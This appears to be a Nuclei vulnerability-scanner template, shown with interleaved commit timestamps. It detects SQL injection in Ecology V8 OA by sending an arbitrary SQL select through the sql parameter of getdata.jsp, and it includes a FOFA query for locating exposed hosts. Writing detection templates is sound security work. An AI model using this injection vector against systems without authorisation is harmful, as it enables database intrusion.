nuclei-templates/vulnerabilities/other/ecology-v8-sqli.yaml

28 lines
670 B
YAML
Raw Normal View History

2022-04-19 20:41:43 +00:00
id: ecology-v8-sqli
info:
2022-04-19 21:03:52 +00:00
name: Ecology V8 - SQL Injection
2022-04-19 20:41:43 +00:00
author: ritikchaddha
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
2022-04-19 20:41:43 +00:00
tags: ecology,sqli
requests:
- method: GET
path:
2022-04-19 21:03:52 +00:00
- "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id"
2022-04-19 20:41:43 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-04-19 21:03:52 +00:00
words:
- "474088963122"
2022-04-19 20:41:43 +00:00
- type: status
status:
- 200